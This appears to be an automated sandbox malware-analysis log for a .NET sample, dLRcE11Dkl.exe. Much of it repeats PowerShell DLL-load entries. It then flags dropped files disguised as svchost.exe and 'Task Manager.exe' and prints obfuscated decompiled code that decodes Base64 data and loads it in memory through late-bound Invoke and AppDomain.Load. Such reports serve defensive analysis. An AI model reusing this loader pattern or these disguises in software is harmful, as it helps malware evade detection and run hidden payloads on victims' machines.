Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: dLRcE11Dkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: dLRcE11Dkl.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: dLRcE11Dkl.exe Static file information: File size 1801728 > 1048576
Source: dLRcE11Dkl.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1b7400
Source: dLRcE11Dkl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.SAbUtm3FuD1geH6MZGU8SU1Z985RHBZiQAp2wOzlAMVQgmNBd7I,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._4UAtMcj92PErTJ7iYByfV9208mv9STJNNYtSqFciQ5iDcVwI0fw,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle._83oOX4R0XjtQnv8lUVK9DqZ98PiUaZGu1c2jT1KiAtLqbEDbyfB,_0E07AEka0Sx9sYoiUVds8MOhg87nQSeDtD8LjAZ14iYO10nLKle.kxzOsS0LVEPkY4t6cTA7vLnZuLxuF1umttA7vJQGCz0D5n9CR8P,IAdtlBkckGw.XNVguCbI3cVHcP1uRwC7TKGqLfj122dlzqP8ieQ9mctf6lSzq6DWmsjACXSXRodoOOLLcCMdDt4ug7Xyo9Nam4()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FpLD7D4ZCq6[2],IAdtlBkckGw.wsxo9ElBPCWUiK5mgsMnznNx8mHBsB9j0XYSdDNof23sXyNu2NaWUuzO8pmMLINZRt1iT3mCa5R0km4EJisc08(Convert.FromBase64String(FpLD7D4ZCq6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { FpLD7D4ZCq6[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.N6nImViohBIsnGqMDfm0TI6YNwhO0YJ6lNg5xP2ds1QCbdBp00Udb0WaX2vGNSRlRZJl,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.uDnPsG6WkrYkZgozcLEvxEUsDYxfzaSdRH2TfrUHYyiTB8BAOGp4xgOv3opoJGVclxg3,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.fHt2e9tVGbc4nZGRYkmh8V8FP8V5f0czothtaB2EjG78bRZiaB1coFeF235Wa1QCmGkq,_5ygbuQlYXzpOj5vvOa691gU3LoZoNF2rl1YqJVBxR2QJaQvrtMLpHvJqMAhFqC8Xwn0C.Ljf96Ze50zuw4tX37oXMLdO2Oj1sSEXIkhvWSmsYnxy9baTDJ2XnuUMSNP9TdjltI0UM,DPEF9ZxDQwL.UEhXVQIcqzW()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{xEOhLr76BNB[2],DPEF9ZxDQwL.GRbqhF4b4tF(Convert.FromBase64String(xEOhLr76BNB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA
